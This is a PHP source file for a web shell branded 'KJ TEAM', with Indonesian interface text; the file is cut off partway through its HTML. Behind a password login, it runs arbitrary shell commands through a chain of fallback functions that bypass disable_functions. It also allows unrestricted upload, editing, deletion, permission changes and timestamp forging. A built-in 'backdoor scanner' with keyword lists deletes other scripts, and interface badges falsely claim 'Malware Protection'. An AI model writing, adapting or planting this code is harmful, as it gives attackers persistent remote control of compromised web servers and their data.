<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
session_start();

// ============ KONFIGURASI ============
$USERNAME = 'kjteam';
$HASHED_PASSWORD = '$2y$10$mftX2JhqVH8.adFZQGKzAukkw9kl3SBx.SHiHqgHzvITtheDzuNXa';
$isWindows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';

// ============ FUNGSI ALTERNATIF SHELL ============
function runShellCommand($command) {
    $output = '';
    $isWindows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
    $inputPath = isset($_GET['d']) ? urldecode($_GET['d']) : getcwd();
    $currentPath = $isWindows
        ? str_replace('/', DIRECTORY_SEPARATOR, $inputPath)
        : str_replace('\\', DIRECTORY_SEPARATOR, $inputPath);

    $command = "cd " . $currentPath . " && " . $command;
    
    if (function_exists('shell_exec')) {
        $output = shell_exec($command);
    } elseif (function_exists('exec')) {
        exec($command, $lines);
        $output = implode("\n", $lines);
    } elseif (function_exists('system')) {
        ob_start();
        system($command);
        $output = ob_get_clean();
    } elseif (function_exists('passthru')) {
        ob_start();
        passthru($command);
        $output = ob_get_clean();
    } elseif (function_exists('popen')) {
        $handle = popen($command, 'r');
        if ($handle) {
            while (!feof($handle)) {
                $output .= fread($handle, 8192);
            }
            pclose($handle);
        }
    } elseif (function_exists('proc_open')) {
        $descriptorspec = [
            0 => ["pipe", "r"],
            1 => ["pipe", "w"],
            2 => ["pipe", "w"]
        ];
        $process = proc_open($command, $descriptorspec, $pipes);
        if (is_resource($process)) {
            $output = stream_get_contents($pipes[1]);
            fclose($pipes[1]);
            fclose($pipes[0]);
            fclose($pipes[2]);
            proc_close($process);
        } else {
            $output = "❌ Tidak ada fungsi shell yang tersedia. Server memblokir eksekusi perintah.";
            return $output;
        }
    } else {
        $output = "⚠️ Semua fungsi shell diblokir oleh server (disable_functions).\n";
        $output .= "Fungsi yang diblokir: " . ini_get('disable_functions') . "\n";
        return $output;
    }
    
    return $output;
}

// ============ FUNGSI FILE MANAGER ============
function x($string) {
    return htmlspecialchars($string ?? '', ENT_QUOTES, 'UTF-8');
}

function formatSize($bytes) {
    if ($bytes >= 1073741824)
        return number_format($bytes / 1073741824, 2) . ' GB';
    elseif ($bytes >= 1048576)
        return number_format($bytes / 1048576, 2) . ' MB';
    elseif ($bytes >= 1024)
        return number_format($bytes / 1024, 2) . ' KB';
    else
        return $bytes . ' B';
}

function permColor($path) {
    if (is_writable($path))
        return 'style="color:#4a9eff"';
    elseif (is_readable($path))
        return 'style="color:#88ccff"';
    else
        return 'style="color:#ff6b6b"';
}

function file_path_to_url($file_path) {
    $doc_root = realpath($_SERVER['DOCUMENT_ROOT']);
    $real_path = realpath($file_path);

    if ($real_path === false || strpos($real_path, $doc_root) !== 0) {
        return false;
    }

    $relative = substr($real_path, strlen($doc_root));
    $relative = str_replace('\\', '/', $relative);
    $relative = ltrim($relative, '/');

    $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://";
    $host = $_SERVER['HTTP_HOST'];
    $url = $protocol . $host . '/' . $relative;

    return $url;
}

function generate_random_string($length = 10, $prefix = 'KjTeam') {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $random = '';
    $rand_length = $length - strlen($prefix);

    for ($i = 0; $i < $rand_length; $i++) {
        $random .= $chars[random_int(0, strlen($chars) - 1)];
    }

    return $prefix . $random;
}

function backupFile($filePath) {
    if (!file_exists($filePath)) return false;
    $backupDir = dirname($filePath) . '/.backup_' . date('Ymd');
    if (!is_dir($backupDir)) {
        mkdir($backupDir, 0755, true);
    }
    $backupFile = $backupDir . '/' . basename($filePath) . '_' . time() . '.bak';
    return copy($filePath, $backupFile);
}

function isSuspiciousFile($content) {
    $patterns = [
        '/<\?php\s*eval\(\s*\$_\w+\s*\)/',
        '/<\?php\s*@?\s*eval\(/',
        '/base64_decode\s*\(/',
        '/gzinflate\s*\(/',
        '/assert\s*\(/',
        '/system\s*\(/',
        '/shell_exec\s*\(/',
        '/exec\s*\(/',
        '/passthru\s*\(/',
    ];
    
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $content)) {
            return true;
        }
    }
    return false;
}

function scanFileForMalware($filePath) {
    if (!file_exists($filePath)) return false;
    $content = @file_get_contents($filePath);
    if (!$content) return false;
    return isSuspiciousFile($content);
}

function quarantineFile($filePath) {
    if (!file_exists($filePath)) return false;
    $quarantineDir = __DIR__ . '/.quarantine_' . date('Ymd');
    if (!is_dir($quarantineDir)) {
        mkdir($quarantineDir, 0700, true);
    }
    
    $quarantineFile = $quarantineDir . '/' . basename($filePath) . '_' . time() . '.quar';
    if (rename($filePath, $quarantineFile)) {
        return true;
    }
    return false;
}

// ============ FUNGSI NAVIGASI ============
function getDriveList() {
    $drives = [];
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        for ($i = 67; $i <= 90; $i++) {
            $drive = chr($i) . ':';
            if (is_dir($drive . '\\')) {
                $drives[] = $drive;
            }
        }
        if (empty($drives)) {
            $drives = ['C:', 'D:', 'E:', 'F:', 'G:', 'H:'];
        }
    }
    return $drives;
}

// ============ BREADCRUMB NAVIGATOR ============
function buildBreadcrumb($path) {
    $isWindows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
    
    if ($isWindows) {
        $parts = explode('\\', $path);
        if (strpos($path, ':') !== false) {
            $drive = $parts[0];
            $parts = array_filter($parts);
        }
    } else {
        $parts = explode('/', $path);
        $parts = array_filter($parts);
    }
    
    $breadcrumb = [];
    $currentPath = '';
    
    if ($isWindows && isset($drive)) {
        $currentPath = $drive . '\\';
        $breadcrumb[] = [
            'name' => $drive,
            'path' => $drive . '\\',
            'isRoot' => true
        ];
    } else {
        $breadcrumb[] = [
            'name' => '/',
            'path' => '/',
            'isRoot' => true
        ];
        $currentPath = '/';
    }
    
    foreach ($parts as $part) {
        if ($part === '') continue;
        $currentPath .= $part . ($isWindows ? '\\' : '/');
        $breadcrumb[] = [
            'name' => $part,
            'path' => $currentPath,
            'isRoot' => false
        ];
    }
    
    return $breadcrumb;
}

// ============ LOGIN ============
$inputPath = isset($_GET['d']) ? urldecode($_GET['d']) : getcwd();
$currentPath = $isWindows
    ? str_replace('/', DIRECTORY_SEPARATOR, $inputPath)
    : str_replace('\\', DIRECTORY_SEPARATOR, $inputPath);

if (!is_dir($currentPath)) {
    $currentPath = getcwd();
}

if (!isset($_SESSION['logged_in'])) {
    if (isset($_POST['login'])) {
        if ($_POST['username'] === $USERNAME && password_verify($_POST['password'], $HASHED_PASSWORD)) {
            $_SESSION['logged_in'] = true;
            header("Location: " . $_SERVER['PHP_SELF']);
            exit;
        } else {
            $error = "Username atau password salah.";
        }
    }

    echo '<!DOCTYPE html>
    <html lang="id">
    <head>
        <meta charset="UTF-8">
        <title>Login - Kj TEAM</title>
        <style>
            @import url("https://fonts.googleapis.com/css2?family=Chakra+Petch:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,500;1,600;1,700&display=swap");
            body {
                background: linear-gradient(135deg, #0a0e27, #1a1a2e, #16213e);
                color: #88ccff;
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                font-family: "Chakra Petch", monospace;
            }
            .login-box {
                background: linear-gradient(145deg, #0d1117, #161b22);
                border: 2px solid #2d4a7a;
                padding: 40px;
                border-radius: 15px;
                box-shadow: 0 0 30px rgba(45, 74, 122, 0.5), inset 0 0 30px rgba(45, 74, 122, 0.1);
                text-align: center;
                width: 300px;
            }
            .login-box img {
                max-width: 100px;
                border-radius: 50%;
                margin-bottom: 20px;
                box-shadow: 0 0 20px #2d4a7a;
                border: 2px solid #2d4a7a;
            }
            input, button {
                margin: 10px 0;
                padding: 10px;
                width: 100%;
                border: none;
                border-radius: 5px;
                background: #0d1117;
                color: #88ccff;
                font-size: 14px;
                border: 1px solid #2d4a7a;
            }
            button {
                background: linear-gradient(135deg, #1a3a6a, #2d4a7a);
                color: #ffffff;
                font-weight: bold;
                cursor: pointer;
                border: 1px solid #4a7aba;
                transition: all 0.3s;
            }
            button:hover {
                background: linear-gradient(135deg, #2d4a7a, #4a7aba);
                box-shadow: 0 0 20px rgba(45, 74, 122, 0.5);
            }
            h2 {
                margin-bottom: 10px;
                color: #88ccff;
                text-shadow: 0 0 20px #2d4a7a;
            }
            .error {
                color: #ff6b6b;
                margin-top: 10px;
            }
        </style>
    </head>
    <body>
        <form method="POST" class="login-box">
            <img src="https://i.ibb.co/Df8g5PYb/kj.png" alt="Kj TEAM">
            <h2>Kj TEAM PANEL</h2>
            <input type="text" name="username" placeholder="Username" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit" name="login">MASUK</button>
            ' . (isset($error) ? "<div class='error'>$error</div>" : "") . '
        </form>
    </body>
    </html>';
    exit;
}

if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

if (!is_dir($currentPath)) {
    die("Direktori tidak valid: <code>$currentPath</code>");
}

// ============ HANDLE POST REQUEST ============
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Unzip
    if (isset($_POST['action']) && $_POST['action'] === 'unzip' && !empty($_POST['zip_path'])) {
        $zipPath = $_POST['zip_path'];
        $zip = new ZipArchive();
        if ($zip->open($zipPath) === true) {
            $zip->extractTo($currentPath);
            $zip->close();
            echo json_encode(['status' => 'success', 'message' => 'Berhasil extract file ZIP.']);
        } else {
            echo json_encode(['status' => 'error', 'message' => 'Gagal membuka file ZIP.']);
        }
        exit;
    }

    // Zip
    if (isset($_POST['action']) && $_POST['action'] === 'zip' && !empty($_POST['folder_to_zip'])) {
        $folderToZip = $_POST['folder_to_zip'];
        $zipName = basename($folderToZip) . ".zip";
        $zipPath = $currentPath . DIRECTORY_SEPARATOR . $zipName;

        $zip = new ZipArchive();
        if ($zip->open($zipPath, ZipArchive::CREATE | ZipArchive::OVERWRITE)) {
            $folderRealPath = realpath($folderToZip);
            $files = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($folderRealPath, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );

            foreach ($files as $file) {
                $filePath = realpath($file);
                $relativePath = substr($filePath, strlen($folderRealPath) + 1);
                if ($file->isDir()) {
                    $zip->addEmptyDir($relativePath);
                } else {
                    $zip->addFile($filePath, $relativePath);
                }
            }

            $zip->close();
            echo json_encode(['status' => 'success', 'message' => "Folder berhasil dijadikan ZIP: $zipName"]);
        } else {
            echo json_encode(['status' => 'error', 'message' => 'Gagal membuat file ZIP.']);
        }
        exit;
    }

    // Run Command
    if (isset($_POST['run_command'])) {
        $command = $_POST['command'];
        $output = runShellCommand($command);
        if ($output !== false && !empty($output)) {
            $message = "<pre style='background:#0d1117;color:#4a9eff;padding:10px;border:1px solid #2d4a7a;border-radius:5px;max-height:400px;overflow:auto;'>" . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . "</pre>";
            $messageType = "success";
        } else {
            $message = "<div class='alert error'>Perintah tidak bisa dijalankan atau tidak menghasilkan output.</div>";
            $messageType = "error";
        }
    }

    // Create File
    if (isset($_POST['create_file']) && !empty($_POST['file_name'])) {
        $newFile = rtrim($currentPath, '/') . '/' . basename($_POST['file_name']);
        if (file_exists($newFile)) {
            $message = "File sudah ada.";
            $messageType = "error";
        } else {
            if (file_put_contents($newFile, '') !== false) {
                $message = "File berhasil dibuat.";
                $messageType = "success";
            } else {
                $message = "Gagal membuat file.";
                $messageType = "error";
            }
        }
    }

    // Edit File
    if (isset($_POST['edit'])) {
        $path = $_POST['edit_path'];
        if (is_file($path)) {
            $content = htmlspecialchars(file_get_contents($path));
            echo "<div style='background:#0d1117;padding:20px;border:1px solid #2d4a7a;border-radius:5px;margin:20px;'>
                <h3 style='color:#4a9eff;'>Edit File: " . basename($path) . "</h3>
                <form method='POST'>
                    <input type='hidden' name='edit_path' value='" . htmlspecialchars($path) . "'>
                    <textarea name='new_content' style='width:100%;height:400px;background:#0a0e27;color:#88ccff;border:1px solid #2d4a7a;border-radius:5px;padding:10px;'>$content</textarea><br>
                    <button type='submit' name='save_edit' style='padding:10px 20px;background:linear-gradient(135deg,#1a3a6a,#2d4a7a);color:#fff;border:none;border-radius:5px;cursor:pointer;'>💾 Simpan</button>
                    <a href='?' style='color:#ff6b6b;margin-left:10px;'>❌ Batal</a>
                </form>
            </div>";
            exit;
        }
    }

    // Save Edit
    if (isset($_POST['save_edit'])) {
        $editPath = $_POST['edit_path'];
        $newContent = $_POST['new_content'];
        
        backupFile($editPath);
        
        if (file_put_contents($editPath, $newContent) !== false) {
            $message = "File berhasil disimpan.";
            $messageType = "success";
        } else {
            $message = "Gagal menyimpan file.";
            $messageType = "error";
        }
    }

    // Change Permission
    if (isset($_POST['change_perm']) && !empty($_POST['perm_path']) && !empty($_POST['permissions'])) {
        $permPath = $_POST['perm_path'];
        $perm = $_POST['permissions'];
        if (@chmod($permPath, octdec($perm))) {
            $message = "Permission berhasil diubah.";
            $messageType = "success";
        } else {
            $message = "Gagal mengubah permission.";
            $messageType = "error";
        }
    }

    // Rename
    if (isset($_POST['rename']) && !empty($_POST['rename_path']) && !empty($_POST['new_name'])) {
        $oldPath = $_POST['rename_path'];
        $newPath = dirname($oldPath) . DIRECTORY_SEPARATOR . basename($_POST['new_name']);
        if (file_exists($newPath)) {
            $message = "Nama baru sudah digunakan.";
            $messageType = "error";
        } else {
            if (rename($oldPath, $newPath)) {
                $message = "Berhasil mengganti nama.";
                $messageType = "success";
            } else {
                $message = "Gagal mengganti nama.";
                $messageType = "error";
            }
        }
    }

    // Upload
    if (isset($_POST['upload']) && isset($_FILES['uploaded_file'])) {
        $targetPath = rtrim($currentPath, '/') . '/' . basename($_FILES['uploaded_file']['name']);
        if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $targetPath)) {
            $message = "File berhasil diupload.";
            $messageType = "success";
        } else {
            $message = "Gagal mengupload file.";
            $messageType = "error";
        }
    }

    // Create Folder
    if (isset($_POST['create_folder']) && !empty($_POST['folder_name'])) {
        $newFolder = rtrim($currentPath, '/') . '/' . basename($_POST['folder_name']);
        if (file_exists($newFolder)) {
            $message = "Folder sudah ada.";
            $messageType = "error";
        } elseif (mkdir($newFolder, 0755)) {
            $message = "Folder berhasil dibuat.";
            $messageType = "success";
        } else {
            $message = "Gagal membuat folder.";
            $messageType = "error";
        }
    }

    // Delete
    if (isset($_POST['delete_path'])) {
        $deletePath = $_POST['delete_path'];
        if (is_file($deletePath)) {
            if (unlink($deletePath)) {
                $message = "File berhasil dihapus.";
                $messageType = "success";
            } else {
                $message = "Gagal menghapus file.";
                $messageType = "error";
            }
        } elseif (is_dir($deletePath)) {
            if (rmdir($deletePath)) {
                $message = "Folder berhasil dihapus.";
                $messageType = "success";
            } else {
                $message = "Gagal menghapus folder (pastikan kosong).";
                $messageType = "error";
            }
        } else {
            $message = "Path tidak ditemukan.";
            $messageType = "error";
        }
    }

    // Change Time
    if (isset($_POST['change_time']) && !empty($_POST['new_time'])) {
        $timePath = $_POST['time_path'];
        $newTime = strtotime($_POST['new_time']);
        if ($newTime !== false && touch($timePath, $newTime, $newTime)) {
            $message = "Tanggal file berhasil diubah.";
            $messageType = "success";
        } else {
            $message = "Format tanggal tidak valid atau gagal mengubah tanggal.";
            $messageType = "error";
        }
    }

    // ============ SCAN BACKDOOR - HANYA PHP, PHTML, SHTML ============
    if (isset($_POST['scan_backdoor'])) {
        $scanPath = $_POST['scan_path'] ?? $currentPath;
        if (!is_dir($scanPath)) {
            echo "<div class='alert error'>⚠️ Direktori tidak valid.</div>";
        } else {
            // HANYA ekstensi PHP, PHTML, SHTML
            $allowedExtensions = ['php', 'phtml', 'shtml'];
            
            $danger_keywords = [
                'tinggi' => ['eval(', 'shell_exec(', 'exec(', 'passthru(', 'system(', 'base64_decode(', 'gzinflate(', 'assert('],
                'biasa' => ['file_put_contents(', 'file_get_contents(', 'move_uploaded_file('],
                'xss' => ['<script', 'alert(', 'document.write(', 'onerror=', 'onload=', 'javascript:', 'expression(']
            ];

            $suspectFiles = [];
            $scanLog = [];
            $scanLog[] = "==================================================";
            $scanLog[] = "📋 HASIL SCAN BACKDOOR - KJ TEAM";
            $scanLog[] = "==================================================";
            $scanLog[] = "📁 Path: " . $scanPath;
            $scanLog[] = "📅 Tanggal: " . date('Y-m-d H:i:s');
            $scanLog[] = "🖥️ IP: " . $_SERVER['REMOTE_ADDR'];
            $scanLog[] = "📁 Ekstensi: PHP, PHTML, SHTML";
            $scanLog[] = "==================================================\n";

            function scanBackdoorDeep($dir, &$results, $danger_keywords, $allowedExtensions, &$scanLog) {
                $items = scandir($dir);
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $path = $dir . DIRECTORY_SEPARATOR . $item;

                    // Skip file log
                    if (basename($path) === 'shell-found.txt' || strpos(basename($path), 'scan_result_') === 0) continue;

                    if (is_dir($path)) {
                        scanBackdoorDeep($path, $results, $danger_keywords, $allowedExtensions, $scanLog);
                    } else {
                        $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
                        // HANYA scan untuk PHP, PHTML, SHTML
                        if (in_array($ext, $allowedExtensions)) {
                            $content = @file_get_contents($path);
                            if (!$content) continue;
                            
                            $content_lower = strtolower($content);
                            $detected = [];
                            $level = '';
                            $matchKeywords = [];

                            foreach ($danger_keywords as $lvl => $keywords) {
                                foreach ($keywords as $kw) {
                                    if (strpos($content_lower, strtolower($kw)) !== false) {
                                        $detected[] = $kw;
                                        $level = $lvl;
                                        $matchKeywords[] = $kw;
                                    }
                                }
                                if (!empty($detected)) {
                                    break;
                                }
                            }

                            if (!empty($detected)) {
                                $results[] = [
                                    'file' => $path,
                                    'level' => $level,
                                    'hits' => $detected
                                ];
                                
                                // Tambahkan ke log
                                $scanLog[] = "🔴 FILE: " . $path;
                                $scanLog[] = "    ⚠️ Level: " . strtoupper($level);
                                $scanLog[] = "    🎯 Ditemukan: " . implode(', ', $detected);
                                $scanLog[] = "    📊 Ukuran: " . formatSize(filesize($path));
                                $scanLog[] = "    📅 Modified: " . date("Y-m-d H:i:s", filemtime($path));
                                $scanLog[] = "    ---";
                            }
                        }
                    }
                }
            }

            scanBackdoorDeep($scanPath, $suspectFiles, $danger_keywords, $allowedExtensions, $scanLog);

            // Tambahkan ringkasan
            $scanLog[] = "\n==================================================";
            $scanLog[] = "📊 RINGKASAN SCAN";
            $scanLog[] = "==================================================";
            $scanLog[] = "📁 Total file mencurigakan: " . count($suspectFiles);
            $scanLog[] = "📅 Selesai pada: " . date('Y-m-d H:i:s');
            $scanLog[] = "==================================================";

            // Simpan ke file TXT
            $timestamp = date('Ymd_His');
            $txtFileName = 'scan_result_' . $timestamp . '.txt';
            $txtFilePath = __DIR__ . '/' . $txtFileName;
            file_put_contents($txtFilePath, implode("\n", $scanLog));

            // Tampilkan hasil di browser
            if (!empty($suspectFiles)) {
                echo "<div style='margin:20px 0;'>";
                echo "<div class='alert success'>✅ Scan selesai! Ditemukan " . count($suspectFiles) . " file mencurigakan.</div>";
                echo "<div style='margin:10px 0;'>";
                echo "<a href='$txtFileName' download class='btn' style='background:#4a9eff;color:#000;'>📥 Download Hasil Scan (TXT)</a>";
                echo " <span style='color:#6c8cba;font-size:12px;'>(" . $txtFileName . ")</span>";
                echo "</div>";
                echo "<h3 style='color:#ff6b6b;'>🛑 Ditemukan File Mencurigakan:</h3><ul>";
                foreach ($suspectFiles as $s) {
                    $file = $s['file'];
                    $level = strtoupper($s['level']);
                    $color = $level === 'TINGGI' ? '#ff6b6b' : ($level === 'XSS' ? '#ffa94d' : '#ffd93d');
                    $hits = implode(', ', $s['hits']);
                    echo "<li style='margin:10px 0;padding:10px;background:#0d1117;border:1px solid #2d4a7a;border-radius:5px;'>
                        <span style='color:#88ccff;'>" . x($file) . "</span> 
                        <span style='background:$color;padding:2px 8px;border-radius:4px;color:#000;margin-left:5px;'>$level</span>
                        <span style='font-size:smaller;color:#6c8cba;'>($hits)</span>
                        <form method='POST' style='display:inline;margin-left:10px;'>
                            <input type='hidden' name='delete_path' value='" . x($file) . "'>
                            <button name='delete' onclick='return confirm(\"Hapus file ini?\")' style='background:#2d4a7a;color:#fff;border:none;padding:2px 10px;border-radius:3px;cursor:pointer;'>[Hapus]</button>
                        </form>
                    </li>";
                }
                echo "</ul>";
                echo "<div style='margin-top:10px;'>";
                echo "<a href='$txtFileName' download class='btn' style='background:#4a9eff;color:#000;'>📥 Download Hasil Scan (TXT)</a>";
                echo " <span style='color:#6c8cba;font-size:12px;'>(" . $txtFileName . ")</span>";
                echo "</div>";
                echo "</div>";
            } else {
                echo "<div class='alert success'>✅ Scan selesai! Tidak ditemukan file mencurigakan.</div>";
                echo "<div style='margin-top:10px;'>";
                echo "<a href='$txtFileName' download class='btn' style='background:#4a9eff;color:#000;'>📥 Download Hasil Scan (TXT)</a>";
                echo " <span style='color:#6c8cba;font-size:12px;'>(" . $txtFileName . ")</span>";
                echo "</div>";
            }
        }
        exit; // Stop eksekusi setelah scan
    }
}

// ============ GET FILE LIST ============
$allItems = scandir($currentPath);
$allFiles = [];
$allFolders = [];
foreach ($allItems as $item) {
    if ($item === '.' || $item === '..')
        continue;
    $itemPath = $currentPath . DIRECTORY_SEPARATOR . $item;
    if (is_dir($itemPath))
        $allFolders[] = $item;
    if (is_file($itemPath) && pathinfo($item, PATHINFO_EXTENSION) === 'zip')
        $allFiles[] = $item;
}

// ============ GET BREADCRUMB ============
$breadcrumb = buildBreadcrumb($currentPath);

// ============ TAMPILAN UTAMA ============
?>
<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>KJ TEAM File Manager</title>
    <style>
        @import url("https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap");
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }
        body {
            font-family: 'Share Tech Mono', monospace;
            background: linear-gradient(145deg, #0a0e27, #0d1117, #161b22);
            color: #88ccff;
            padding: 20px;
            min-height: 100vh;
        }
        .container {
            max-width: 1400px;
            margin: 0 auto;
        }
        .header {
            text-align: center;
            margin-bottom: 30px;
            padding: 20px;
            background: linear-gradient(145deg, #0d1117, #161b22);
            border: 1px solid #2d4a7a;
            border-radius: 10px;
            box-shadow: 0 0 30px rgba(45, 74, 122, 0.2);
        }
        .header img {
            max-width: 150px;
            border-radius: 50%;
            border: 2px solid #2d4a7a;
            box-shadow: 0 0 30px rgba(45, 74, 122, 0.5);
        }
        .header h1 {
            color: #88ccff;
            text-shadow: 0 0 20px rgba(45, 74, 122, 0.5);
            margin-top: 10px;
        }
        .badge {
            display: inline-block;
            padding: 5px 12px;
            margin: 3px;
            border-radius: 15px;
            font-size: 11px;
            border: 1px solid;
        }
        .badge-safe { background: #1a3a2a; color: #4aef4a; border-color: #4a7a4a; }
        .badge-warn { background: #3a3a1a; color: #efef4a; border-color: #7a7a4a; }
        .badge-danger { background: #3a1a1a; color: #ef4a4a; border-color: #7a4a4a; }
        
        /* ============ BREADCRUMB NAVIGATOR ============ */
        .breadcrumb-nav {
            background: #0a0e27;
            border: 1px solid #2d4a7a;
            border-radius: 10px;
            padding: 12px 15px;
            margin-bottom: 20px;
            display: flex;
            flex-wrap: wrap;
            align-items: center;
            gap: 8px;
        }
        .breadcrumb-nav .home-icon {
            color: #4a9eff;
            font-size: 18px;
            margin-right: 5px;
        }
        .breadcrumb-item {
            display: flex;
            align-items: center;
            gap: 8px;
        }
        .breadcrumb-item a {
            color: #88ccff;
            text-decoration: none;
            padding: 4px 10px;
            border-radius: 5px;
            transition: all 0.3s;
            font-size: 13px;
            background: #0d1117;
            border: 1px solid transparent;
        }
        .breadcrumb-item a:hover {
            color: #ffffff;
            background: #1a3a6a;
            border-color: #4a9eff;
            box-shadow: 0 0 20px rgba(74, 158, 255, 0.3);
            transform: translateY(-1px);
        }
        .breadcrumb-item a.current {
            color: #4a9eff;
            background: #1a2a4a;
            border-color: #2d4a7a;
            cursor: default;
        }
        .breadcrumb-item a.current:hover {
            transform: none;
            box-shadow: none;
        }
        .breadcrumb-separator {
            color: #2d4a7a;
            font-size: 16px;
            font-weight: bold;
        }
        .breadcrumb-path-full {
            color: #6c8cba;
            font-size: 11px;
            margin-left: auto;
            background: #0d1117;
            padding: 3px 10px;
            border-radius: 5px;
            border: 1px solid #1a2a4a;
            max-width: 300px;
            overflow: hidden;
            text-overflow: ellipsis;
            white-space: nowrap;
        }
        
        .nav-bar {
            background: #0d1117;
            border: 1px solid #2d4a7a;
            border-radius: 10px;
            padding: 15px;
            margin-bottom: 20px;
        }
        .nav-bar a {
            color: #4a9eff;
            text-decoration: none;
            padding: 5px 10px;
        }
        .nav-bar a:hover {
            color: #88ccff;
            background: #1a2a4a;
            border-radius: 5px;
        }
        
        .section-box {
            background: #0d1117;
            border: 1px solid #2d4a7a;
            border-radius: 10px;
            padding: 15px;
            margin: 10px 0;
        }
        .section-box h3 {
            color: #4a9eff;
            margin-bottom: 10px;
            border-bottom: 1px solid #2d4a7a;
            padding-bottom: 8px;
        }
        
        .btn {
            padding: 6px 12px;
            background: linear-gradient(135deg, #1a3a6a, #2d4a7a);
            color: #fff;
            border: 1px solid #4a7aba;
            border-radius: 5px;
            cursor: pointer;
            transition: all 0.3s;
            font-family: inherit;
        }
        .btn:hover {
            background: linear-gradient(135deg, #2d4a7a, #4a7aba);
            box-shadow: 0 0 20px rgba(45, 74, 122, 0.5);
            transform: translateY(-1px);
        }
        .btn-danger {
            background: linear-gradient(135deg, #6a1a1a, #7a2d2d);
            border-color: #7a4a4a;
        }
        .btn-danger:hover {
            background: linear-gradient(135deg, #7a2d2d, #9a4a4a);
        }
        .btn-sm { padding: 3px 8px; font-size: 12px; }
        
        input[type="text"], input[type="file"], select {
            padding: 6px 10px;
            margin: 5px;
            background: #0a0e27;
            color: #88ccff;
            border: 1px solid #2d4a7a;
            border-radius: 5px;
            font-family: inherit;
        }
        input[type="text"]:focus, select:focus {
            outline: none;
            border-color: #4a9eff;
            box-shadow: 0 0 10px rgba(74, 158, 255, 0.3);
        }
        
        table {
            width: 100%;
            border-collapse: collapse;
            background: #0d1117;
            border: 1px solid #2d4a7a;
            border-radius: 10px;
            overflow: hidden;
        }
        th, td {
            border: 1px solid #2d4a7a;
            padding: 8px 12px;
            text-align: left;
        }
        th {
            background: #0a0e27;
            color: #4a9eff;
        }
        td a {
            color: #88ccff;
            text-decoration: none;
        }
        td a:hover {
            color: #4a9eff;
        }
        
        .alert {
            padding: 12px 15px;
            border-radius: 5px;
            margin: 10px 0;
            border: 1px solid;
        }
        .alert.success {
            background: #0a1e2a;
            color: #4a9eff;
            border-color: #2d4a7a;
        }
        .alert.error {
            background: #2a0a0a;
            color: #ff6b6b;
            border-color: #7a2d2d;
        }
        .alert.info {
            background: #0a1a2a;
            color: #88ccff;
            border-color: #2d4a7a;
        }
        
        .flex-wrap {
            display: flex;
            flex-wrap: wrap;
            gap: 5px;
            align-items: center;
        }
        .mt-10 { margin-top: 10px; }
        .mb-10 { margin-bottom: 10px; }
        
        @media (max-width: 768px) {
            body { padding: 10px; }
            table { font-size: 12px; }
            td { display: block; width: 100%; }
            .breadcrumb-path-full { display: none; }
            .breadcrumb-item a { font-size: 11px; padding: 3px 6px; }
        }
    </style>
    <script>
        function confirmDelete() {
            return confirm('Yakin ingin menghapus file/folder ini?');
        }
        
        function navigateTo(path) {
            window.location.href = '?d=' + encodeURIComponent(path);
        }
    </script>
</head>
<body>
<div class="container">
    <!-- HEADER -->
    <div class="header">
        <img src="https://i.ibb.co/Df8g5PYb/kj.png" alt="Kj TEAM">
        <h1>KJ TEAM FILE MANAGER</h1>
        <div>
            <span class="badge badge-safe">🔒 Secure Mode</span>
            <span class="badge badge-safe">🛡️ Malware Protection</span>
            <span class="badge badge-warn">📁 File Manager</span>
        </div>
    </div>

    <!-- NAV -->
    <div class="nav-bar flex-wrap">
        <a href="?logout=1" style="color:#ff6b6b;">🚪 Logout</a>
        <span style="color:#6c8cba;">|</span>
        <a href="?d=/">🏠 Root</a>
        <span style="color:#6c8cba;">|</span>
        <span style="color:#4a9eff;">📂 <?php echo x($currentPath); ?></span>
    </div>

    <!-- MESSAGE -->
    <?php if (!empty($message)): ?>
        <div class="alert <?php echo $messageType; ?>"><?php echo $message; ?></div>
    <?php endif; ?>

    <!-- ============ BREADCRUMB NAVIGATOR ============ -->
    <div class="breadcrumb-nav">
        <span class="home-icon">🏠</span>
        <?php foreach ($breadcrumb as $index => $item): ?>
            <div class="breadcrumb-item">
                <?php if ($index > 0): ?>
                    <span class="breadcrumb-separator">›</span>
                <?php endif; ?>
                <?php if ($index === count($breadcrumb) - 1): ?>
                    <a href="#" class="current"><?php echo x($item['name']); ?></a>
                <?php else: ?>
                    <a href="?d=<?php echo urlencode($item['path']); ?>"><?php echo x($item['name']); ?></a>
                <?php endif; ?>
            </div>
        <?php endforeach; ?>
        <span class="breadcrumb-path-full" title="<?php echo x($currentPath); ?>">
            📍 <?php echo x($currentPath); ?>
        </span>
    </div>

    <!-- DISABLE FUNCTIONS INFO -->
    <?php
    $disabled = ini_get('disable_functions');
    if (!empty($disabled)) {
        echo "<div class='alert info'>⚠️ Fungsi yang diblokir: <strong>$disabled</strong></div>";
    }
    ?>

    <!-- COMMAND SHELL -->
    <div class="section-box">
        <h3>💻 Shell Command</h3>
        <form method="POST" class="flex-wrap">
            <input type="text" name="command" placeholder="Masukkan perintah..." style="flex:1;min-width:200px;">
            <button type="submit" name="run_command" class="btn">▶️ Jalankan</button>
        </form>
        <div class="flex-wrap mt-10">
